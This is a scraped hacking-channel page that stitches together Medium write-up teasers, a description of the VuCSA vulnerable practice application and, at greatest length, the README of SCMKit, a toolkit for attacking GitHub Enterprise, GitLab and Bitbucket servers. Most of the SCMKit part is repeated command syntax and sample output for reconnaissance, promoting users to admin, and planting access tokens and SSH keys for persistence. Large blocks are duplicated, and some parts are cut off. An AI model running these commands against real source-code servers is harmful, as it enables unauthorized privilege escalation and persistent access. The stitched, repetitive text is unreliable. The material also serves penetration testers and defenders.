Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Razor Black Active Directory Writeup
https://cdn-images-1.medium.com/max/1920/1*gb0lOeaxAujKFNf4NX_OuA.png
These guys call themselves hackers. Can you show them who’s the boss ??
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Razor Black Active Directory Writeup
https://cdn-images-1.medium.com/max/1920/1*gb0lOeaxAujKFNf4NX_OuA.png
These guys call themselves hackers. Can you show them who’s the boss ??
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Razor Black Active Directory Writeup
These guys call themselves hackers. Can you show them who’s the boss ??
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe | 0Day | Write-Up
https://cdn-images-1.medium.com/max/786/1*khznbmsZUUyR1QsVbpcNpA.png
Hey Folks,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe | 0Day | Write-Up
https://cdn-images-1.medium.com/max/786/1*khznbmsZUUyR1QsVbpcNpA.png
Hey Folks,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe | 0Day | Write-Up
Hey Folks,
SCMKit - Source Code Management Attack Toolkit
http://www.kitploit.com/2022/11/scmkit-source-code-management-attack.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/11/scmkit-source-code-management-attack.html
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
C:\source\SCMKit\SCMKit\bin\Release>SCMKit.exe -s bitbucket -m searchfile -c apikey -u http://bitbucket.hogwarts.local:7990 -o jenkinsfile
==================================================
Module: searchfile
System: bitbucket
Auth Type: API Key
Options: jenkinsfile
Target URL: http://bitbucket.hogwarts.local:7990
Timestamp: 1/14/2022 10:17:59 PM
==================================================
[>] REPO: http://bitbucket.hogwarts.local:7990/scm/~HPOTTER/hpotter
[>] FILE: Jenkinsfile
[>] REPO: http://bitbucket.hogwarts.local:7990/scm/STUD/cred-decryption
[>] FILE: subDir/Jenkinsfile
Total matching results: 2
List Snippets Use Case List snippets owned by the current user in GitLab Syntax Provide the listsnippet module, along with any relevant authentication information and URL. GitLab Enterprise SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local Example Output
C:\>SCMKit.exe -s gitlab -m listsnippet -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listsnippet
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:17:36 PM
==================================================
Title | Raw URL
---------------------------------------------------------------------------------------------
spell-script | https://gitlab.hogwarts.local/-/snippets/2/raw
List Runners Use Case List all GitLab runners available to the current user in GitLab Syntax Provide the listrunner module, along with any relevant authentication information and URL. If the user is an administrator, you will be able to list all runners within the GitLab Enterprise instance, which includes shared and group runners. GitLab Enterprise SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local Example Output
C:\>SCMKit.exe -s gitlab -m listrunner -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listrunner
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/25/2022 11:40:08 AM
==================================================
ID | Name | Repo Assigned
---------------------------------------------------------------------------------
2 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/spellbook.git
3 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/maraudersmap.git
List Gists Use Case List gists owned by the current user in GitHub Syntax Provide the listgist module, along with any relevant authentication information and URL. GitHub Enterprise SCMKit.exe -s github -m listgist -c userName:password -u https://github.something.local SCMKit.exe -s github -m listgist -c apikey -u https://github.something.local Example Output
C:\>SCMKit.exe -s github -m listgist -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: listgist
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:43:23 PM
==================================================
Description | Visibility | URL
----------------------------------------------------------------------------------------------------------
___________________________
@hacking_Attack
@Hacking_Video
==================================================
Module: searchfile
System: bitbucket
Auth Type: API Key
Options: jenkinsfile
Target URL: http://bitbucket.hogwarts.local:7990
Timestamp: 1/14/2022 10:17:59 PM
==================================================
[>] REPO: http://bitbucket.hogwarts.local:7990/scm/~HPOTTER/hpotter
[>] FILE: Jenkinsfile
[>] REPO: http://bitbucket.hogwarts.local:7990/scm/STUD/cred-decryption
[>] FILE: subDir/Jenkinsfile
Total matching results: 2
List Snippets Use Case List snippets owned by the current user in GitLab Syntax Provide the listsnippet module, along with any relevant authentication information and URL. GitLab Enterprise SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local Example Output
C:\>SCMKit.exe -s gitlab -m listsnippet -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listsnippet
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:17:36 PM
==================================================
Title | Raw URL
---------------------------------------------------------------------------------------------
spell-script | https://gitlab.hogwarts.local/-/snippets/2/raw
List Runners Use Case List all GitLab runners available to the current user in GitLab Syntax Provide the listrunner module, along with any relevant authentication information and URL. If the user is an administrator, you will be able to list all runners within the GitLab Enterprise instance, which includes shared and group runners. GitLab Enterprise SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local Example Output
C:\>SCMKit.exe -s gitlab -m listrunner -c username:password -u https://gitlab.hogwarts.local
==================================================
Module: listrunner
System: gitlab
Auth Type: Username/Password
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/25/2022 11:40:08 AM
==================================================
ID | Name | Repo Assigned
---------------------------------------------------------------------------------
2 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/spellbook.git
3 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/maraudersmap.git
List Gists Use Case List gists owned by the current user in GitHub Syntax Provide the listgist module, along with any relevant authentication information and URL. GitHub Enterprise SCMKit.exe -s github -m listgist -c userName:password -u https://github.something.local SCMKit.exe -s github -m listgist -c apikey -u https://github.something.local Example Output
C:\>SCMKit.exe -s github -m listgist -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: listgist
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:43:23 PM
==================================================
Description | Visibility | URL
----------------------------------------------------------------------------------------------------------
___________________________
@hacking_Attack
@Hacking_Video
List Orgs Use Case List all organizations the current user belongs to in GitHub Syntax Provide the listorg module, along with any relevant authentication information and URL. GitHub Enterprise SCMKit.exe -s github -m listorg -c userName:password -u https://github.something.local SCMKit.exe -s github -m listorg -c apiKey -u https://github.something.local Example Output
C:\>SCMKit.exe -s github -m listorg -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: listorg
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:44:48 PM
==================================================
Name | URL
-----------------------------------------------------------------------------------
Hogwarts | https://github-enterprise.hogwarts.local/api/v3/orgs/Hogwarts/repos
Get Privileges of API Token Use Case Get the assigned privileges to an access token being used in a particular SCM system Syntax Provide the privs module, along with an API key and URL. GitHub Enterprise SCMKit.exe -s github -m privs -c apiKey -u https://github.something.local GitLab Enterprise SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local Example Output
C:\>SCMKit.exe -s gitlab -m privs -c apikey -u https://gitlab.hogwarts.local
==================================================
Module: privs
System: gitlab
Auth Type: API Key
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:18:27 PM
==================================================
Token Name | Active? | Privilege | Description
---------------------------------------------------------------------------------------------------------------------------------
hgranger-api-token | True | api | Read-write for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_user | Read-only for endpoints under /users. Essentially, access to any of the GET requests in the Users API.
hgranger-api-token | True | read_api | Read-only for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_repository | Read-only (pull) for the repository through git clone.
hgranger-api-token | True | write_repository | Read-write (pull, push) for the repository through git clone. Required for accessing Git repositories over HTTP when 2FA is enabled.
Add Admin Use Case Promote a normal user to an administrative role in a particular SCM system Syntax Provide the addadmin module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to add an administrative role to. GitHub Enterprise SCMKit.exe -s github -m addadmin -c userName:password -u https://github.something.local -o targetUserName SCMKit.exe -s github -m addadmin -c apikey -u https://github.something.local -o targetUserName GitLab Enterprise SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName Bitbucket Server Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. SCMKit.exe -s bitbucket -m addadmin -c userName:password -u https://bitbucket.something.local -o targetUserName Example Output
___________________________
@hacking_Attack
@Hacking_Video
C:\>SCMKit.exe -s github -m listorg -c username:password -u https://github-enterprise.hogwarts.local
==================================================
Module: listorg
System: github
Auth Type: Username/Password
Options:
Target URL: https://github-enterprise.hogwarts.local
Timestamp: 1/14/2022 9:44:48 PM
==================================================
Name | URL
-----------------------------------------------------------------------------------
Hogwarts | https://github-enterprise.hogwarts.local/api/v3/orgs/Hogwarts/repos
Get Privileges of API Token Use Case Get the assigned privileges to an access token being used in a particular SCM system Syntax Provide the privs module, along with an API key and URL. GitHub Enterprise SCMKit.exe -s github -m privs -c apiKey -u https://github.something.local GitLab Enterprise SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local Example Output
C:\>SCMKit.exe -s gitlab -m privs -c apikey -u https://gitlab.hogwarts.local
==================================================
Module: privs
System: gitlab
Auth Type: API Key
Options:
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:18:27 PM
==================================================
Token Name | Active? | Privilege | Description
---------------------------------------------------------------------------------------------------------------------------------
hgranger-api-token | True | api | Read-write for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_user | Read-only for endpoints under /users. Essentially, access to any of the GET requests in the Users API.
hgranger-api-token | True | read_api | Read-only for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_repository | Read-only (pull) for the repository through git clone.
hgranger-api-token | True | write_repository | Read-write (pull, push) for the repository through git clone. Required for accessing Git repositories over HTTP when 2FA is enabled.
Add Admin Use Case Promote a normal user to an administrative role in a particular SCM system Syntax Provide the addadmin module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to add an administrative role to. GitHub Enterprise SCMKit.exe -s github -m addadmin -c userName:password -u https://github.something.local -o targetUserName SCMKit.exe -s github -m addadmin -c apikey -u https://github.something.local -o targetUserName GitLab Enterprise SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName Bitbucket Server Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. SCMKit.exe -s bitbucket -m addadmin -c userName:password -u https://bitbucket.something.local -o targetUserName Example Output
___________________________
@hacking_Attack
@Hacking_Video
C:\>SCMKit.exe -s gitlab -m removeadmin -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: removeadmin
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:20:12 PM
==================================================
[+] SUCCESS: The hgranger user was successfully removed from the admin role.
Create Access Token Use Case Create an access token to be used in a particular SCM system Syntax Provide the createpat module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to create an access token for. GitLab Enterprise This can only be performed as an administrator. You will provide the username that you would like to create a PAT for. SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName Bitbucket Server Creates PAT for the current user authenticating as. In Bitbucket you cannot create a PAT for another user, even as an admin. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the PAT ID that is shown after being created. You will need this when you need to remove the PAT in the future. SCMKit.exe -s bitbucket -m createpat -c userName:password -u https://bitbucket.something.local Example Output
C:\>SCMKit.exe -s gitlab -m createpat -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: createpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:51:23 PM
==================================================
ID | Name | Token
-----------------------------------------------------
59 | SCMKIT-AaCND | R3ySx_8HUn6UQ_6onETx
[+] SUCCESS: The hgranger user personal access token was successfully added.
List Access Tokens Use Case List access tokens for a user on a particular SCM system Syntax Provide the listpat module, along with any relevant authentication information and URL. GitLab Enterprise Only requires admin if you want to list another user's PAT's. A regular user can list their own PAT's. SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser Bitbucket Server List access tokens for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local List access tokens for another user (requires admin). Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local -o targetUser Example Output
C:\>SCMKit.exe -s gitlab -m listpat -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: listpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:54:41 PM
==================================================
ID | Name | Active? | Scopes
----------------------------------------------------------------------------------------------
59 | SCMKIT-AaCND | True | api, read_repository, write_repository
___________________________
@hacking_Attack
@Hacking_Video
==================================================
Module: removeadmin
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/14/2022 9:20:12 PM
==================================================
[+] SUCCESS: The hgranger user was successfully removed from the admin role.
Create Access Token Use Case Create an access token to be used in a particular SCM system Syntax Provide the createpat module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to create an access token for. GitLab Enterprise This can only be performed as an administrator. You will provide the username that you would like to create a PAT for. SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName Bitbucket Server Creates PAT for the current user authenticating as. In Bitbucket you cannot create a PAT for another user, even as an admin. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the PAT ID that is shown after being created. You will need this when you need to remove the PAT in the future. SCMKit.exe -s bitbucket -m createpat -c userName:password -u https://bitbucket.something.local Example Output
C:\>SCMKit.exe -s gitlab -m createpat -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: createpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:51:23 PM
==================================================
ID | Name | Token
-----------------------------------------------------
59 | SCMKIT-AaCND | R3ySx_8HUn6UQ_6onETx
[+] SUCCESS: The hgranger user personal access token was successfully added.
List Access Tokens Use Case List access tokens for a user on a particular SCM system Syntax Provide the listpat module, along with any relevant authentication information and URL. GitLab Enterprise Only requires admin if you want to list another user's PAT's. A regular user can list their own PAT's. SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser Bitbucket Server List access tokens for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local List access tokens for another user (requires admin). Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local -o targetUser Example Output
C:\>SCMKit.exe -s gitlab -m listpat -c username:password -u https://gitlab.hogwarts.local -o hgranger
==================================================
Module: listpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:54:41 PM
==================================================
ID | Name | Active? | Scopes
----------------------------------------------------------------------------------------------
59 | SCMKIT-AaCND | True | api, read_repository, write_repository
___________________________
@hacking_Attack
@Hacking_Video
Remove Access Token Use Case Remove an access token for a user in a particular SCM system Syntax Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the target user PAT ID you would like to remove an access token for. GitLab Enterprise Only requires admin if you want to remove another user's PAT. A regular user can remove their own PAT. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT and also when you listed the PAT. SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.something.local -o patID Bitbucket Server Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT. SCMKit.exe -s bitbucket -m removepat -c userName:password -u https://bitbucket.something.local -o patID Example Output
C:\>SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.hogwarts.local -o 58
==================================================
Module: removepat
System: gitlab
Auth Type: API Key
Options: 59
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:56:47 PM
==================================================
[*] INFO: Revoking personal access token of ID: 59
[+] SUCCESS: The personal access token of ID 59 was successfully revoked.
Create SSH Key Use Case Create an SSH key to be used in a particular SCM system Syntax Provide the createsshkey module, along with any relevant authentication information and URL. GitHub Enterprise Creates SSH key for the current user authenticating as. SCMKit.exe -s github -m createsshkey -c userName:password -u https://github.something.local -o "ssh public key" SCMKit.exe -s github -m createsshkey -c apiToken -u https://github.something.local -o "ssh public key" GitLab Enterprise Creates SSH key for the current user authenticating as. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future. SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key" Bitbucket Server Creates SSH key for the current user authenticating as. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future. SCMKit.exe -s bitbucket -m createsshkey -c userName:password -u https://bitbucket.something.local -o "ssh public key" Example Output List SSH Keys Use Case List SSH keys for a user on a particular SCM system Syntax Provide the listsshkey module, along with any relevant authentication information and URL. GitHub Enterprise List SSH keys for current user. This will include SSH key ID's, which is needed when you would want to remove an SSH key. SCMKit.exe -s github -m listsshkey -c userName:password -u https://github.something.local SCMKit.exe -s github -m listsshkey -c apiToken -u https://github.something.local GitLab Enterprise List SSH keys for current user. SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://gitlab.something.local Bitbucket Server List SSH keys for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. SCMKit.exe -s bitbucket -m listsshkey -c userName:password -u https://bitbucket.something.local Example Output
C:\>SCMKit.exe -s gitlab -m listsshkey -u http://gitlab.hogwarts.local -c apiToken
___________________________
@hacking_Attack
@Hacking_Video
C:\>SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.hogwarts.local -o 58
==================================================
Module: removepat
System: gitlab
Auth Type: API Key
Options: 59
Target URL: https://gitlab.hogwarts.local
Timestamp: 1/20/2022 1:56:47 PM
==================================================
[*] INFO: Revoking personal access token of ID: 59
[+] SUCCESS: The personal access token of ID 59 was successfully revoked.
Create SSH Key Use Case Create an SSH key to be used in a particular SCM system Syntax Provide the createsshkey module, along with any relevant authentication information and URL. GitHub Enterprise Creates SSH key for the current user authenticating as. SCMKit.exe -s github -m createsshkey -c userName:password -u https://github.something.local -o "ssh public key" SCMKit.exe -s github -m createsshkey -c apiToken -u https://github.something.local -o "ssh public key" GitLab Enterprise Creates SSH key for the current user authenticating as. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future. SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key" Bitbucket Server Creates SSH key for the current user authenticating as. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future. SCMKit.exe -s bitbucket -m createsshkey -c userName:password -u https://bitbucket.something.local -o "ssh public key" Example Output List SSH Keys Use Case List SSH keys for a user on a particular SCM system Syntax Provide the listsshkey module, along with any relevant authentication information and URL. GitHub Enterprise List SSH keys for current user. This will include SSH key ID's, which is needed when you would want to remove an SSH key. SCMKit.exe -s github -m listsshkey -c userName:password -u https://github.something.local SCMKit.exe -s github -m listsshkey -c apiToken -u https://github.something.local GitLab Enterprise List SSH keys for current user. SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://gitlab.something.local Bitbucket Server List SSH keys for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. SCMKit.exe -s bitbucket -m listsshkey -c userName:password -u https://bitbucket.something.local Example Output
C:\>SCMKit.exe -s gitlab -m listsshkey -u http://gitlab.hogwarts.local -c apiToken
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
SCMKit - Source Code Management Attack Toolkit
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSFHzfp_0fwm8HENFxmHuIDfxDmOe-1lAo3YiqDCfxVfzb6JovdYIpJyMKGu03c1J-Yc7ADqT-v2LOMoalLkj7T-IWLlTLzh4puPwy8mlYpWn0SHrlbxzrcKaKu4yc6qIMb7nR6GTksEeO5FUPDQtdQyEMBWp1G7A__EpPOdun1x-dAs20Z162tVTgcg/w640-h418/h37.png Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community. Installation/BuildingLibraries UsedThe below 3rd party libraries are used in this project.
Library URL License Octokit https://github.com/octokit/octokit.net MIT License Fody https://github.com/Fody/Fody MIT License GitLabApiClient https://github.com/nmklotas/GitLabApiClient MIT License Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License Pre-Compiled* Use the pre-compiled binary in Releases Building YourselfTake the below steps to setup Visual Studio in order to compile the project yourself. This requires a .NET library that can be installed from the NuGet package manager.
* Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
* Go to "NuGet Package Manager" --> "Package Sources"
* Add a package source with the URL
*
* -s, -system - system to attack (github,gitlab,bitbucket)
* -u, -url - URL for GitHub Enterprise, GitLab Enterprise or Bitbucket Server
* -m, -module - module to run
* -o, -option - options (when applicable) Systems (-s, -system)* github:GitHub Enterprise
* gitlab:GitLab Enterprise
* bitbucket:Bitbucket Server Modules (-m, -module)* listrepo:list all repos the current user can see
* searchrepo:search for a given repo
* searchcode:search for code containing keyword search term
* searchfile:search for filename containing keyword search term
* listsnippet:list all snippets of current user
* listrunner:list all GitLab runners available to current user
* listgist:list all gists of current user
* listorg:list all orgs current user belongs to
* privs:get privs of current API token
* addadmin:promote given user to admin role
* removeadmin:demote given user from admin role
* createpat:create personal access token for target user
* listpat:list personal access tokens for a target user
* removepat:remove personal access token for a target user
* createsshkey:create SSH key for current user
* listsshkey:list SSH keys for current user
* removesshkey:remove SSH key for current user
* adminstats:get admin stats (users, repos, orgs, gists)
* protection:get branch protection settings Module Details TableThe below table shows where each module is supported
Attack Scenario Module Requires Admin? GitHub Enterprise GitLab Enterprise Bitbucket Server Reconnaissance
___________________________
@hacking_Attack
@Hacking_Video
SCMKit - Source Code Management Attack Toolkit
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSFHzfp_0fwm8HENFxmHuIDfxDmOe-1lAo3YiqDCfxVfzb6JovdYIpJyMKGu03c1J-Yc7ADqT-v2LOMoalLkj7T-IWLlTLzh4puPwy8mlYpWn0SHrlbxzrcKaKu4yc6qIMb7nR6GTksEeO5FUPDQtdQyEMBWp1G7A__EpPOdun1x-dAs20Z162tVTgcg/w640-h418/h37.png Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community. Installation/BuildingLibraries UsedThe below 3rd party libraries are used in this project.
Library URL License Octokit https://github.com/octokit/octokit.net MIT License Fody https://github.com/Fody/Fody MIT License GitLabApiClient https://github.com/nmklotas/GitLabApiClient MIT License Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License Pre-Compiled* Use the pre-compiled binary in Releases Building YourselfTake the below steps to setup Visual Studio in order to compile the project yourself. This requires a .NET library that can be installed from the NuGet package manager.
* Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
* Go to "NuGet Package Manager" --> "Package Sources"
* Add a package source with the URL
https://api.nuget.org/v3/index.json* Install the below NuGet packages *
Install-Package Costura.Fody -Version 3.3.3* Install-Package Octokit* Install-Package GitLabApiClient* Install-Package Newtonsoft.Json* You can now build the project yourself! UsageArguments/Options* -c, -credential - credential for authentication (username:password or apiKey)* -s, -system - system to attack (github,gitlab,bitbucket)
* -u, -url - URL for GitHub Enterprise, GitLab Enterprise or Bitbucket Server
* -m, -module - module to run
* -o, -option - options (when applicable) Systems (-s, -system)* github:GitHub Enterprise
* gitlab:GitLab Enterprise
* bitbucket:Bitbucket Server Modules (-m, -module)* listrepo:list all repos the current user can see
* searchrepo:search for a given repo
* searchcode:search for code containing keyword search term
* searchfile:search for filename containing keyword search term
* listsnippet:list all snippets of current user
* listrunner:list all GitLab runners available to current user
* listgist:list all gists of current user
* listorg:list all orgs current user belongs to
* privs:get privs of current API token
* addadmin:promote given user to admin role
* removeadmin:demote given user from admin role
* createpat:create personal access token for target user
* listpat:list personal access tokens for a target user
* removepat:remove personal access token for a target user
* createsshkey:create SSH key for current user
* listsshkey:list SSH keys for current user
* removesshkey:remove SSH key for current user
* adminstats:get admin stats (users, repos, orgs, gists)
* protection:get branch protection settings Module Details TableThe below table shows where each module is supported
Attack Scenario Module Requires Admin? GitHub Enterprise GitLab Enterprise Bitbucket Server Reconnaissance
listrepo[...]___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
KitPloit - PenTest Tools!
SCMKit - Source Code Management Attack Toolkit
___________________________
@hacking_Attack
@Hacking_Video
SCMKit - Source Code Management Attack Toolkit
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Kali Linux Tutorials
VuCSA : Vulnerable Client-Server Application – Made For Learning/Presenting
Vulnerable client-server application (VuCSA) is made for learning/presenting how to perform penetration tests of non-http thick clients. It is written in Java (with JavaFX graphical user interface).
Currently the vulnerable application contains the following challenges:
1. Buffer Over-read (simulated)
2. Command Execution
3. SQL Injection
4. Enumeration
5. XML
6. Horizontal Access Control
7. Vertical Access Control
If you want to know how to solve these challenges, take a look at the PETEP website, which describes how to use the open-source tool PETEP to exploit them.
Tip: Before you start hacking, do not forget to check the data structure of messages bellow.
How to Run?
In order to run the vulnerable server and client, you can use one of releases on GitHub or run gradle assemble, which creates distribution packages (for both Windows and Unix). These packages contain sh/bat scripts that will run the server and client using JVM.
Project Structure
Project is divided into three modules:
* vucsa-common – common functionality for both client and server (including protocol processing utilities)
* vucsa-client – vulnerable client with JavaFX GUI
* vucsa-server – vulnerable server for terminal use
Data Structure
Messages transmitted between server and client have the following simple format:
[type][target][length][payload]
32b 32b 32b ???
These four parts have the following meaning:
* type – type of the message (used for serialization/deserialization)
* target – target handler that will receive the message
* length – length of the payload
* payload – data serialized into bytes
Click Here To Download
___________________________
@hacking_Attack
@Hacking_Video
VuCSA : Vulnerable Client-Server Application – Made For Learning/Presenting
Vulnerable client-server application (VuCSA) is made for learning/presenting how to perform penetration tests of non-http thick clients. It is written in Java (with JavaFX graphical user interface).
Currently the vulnerable application contains the following challenges:
1. Buffer Over-read (simulated)
2. Command Execution
3. SQL Injection
4. Enumeration
5. XML
6. Horizontal Access Control
7. Vertical Access Control
If you want to know how to solve these challenges, take a look at the PETEP website, which describes how to use the open-source tool PETEP to exploit them.
Tip: Before you start hacking, do not forget to check the data structure of messages bellow.
How to Run?
In order to run the vulnerable server and client, you can use one of releases on GitHub or run gradle assemble, which creates distribution packages (for both Windows and Unix). These packages contain sh/bat scripts that will run the server and client using JVM.
Project Structure
Project is divided into three modules:
* vucsa-common – common functionality for both client and server (including protocol processing utilities)
* vucsa-client – vulnerable client with JavaFX GUI
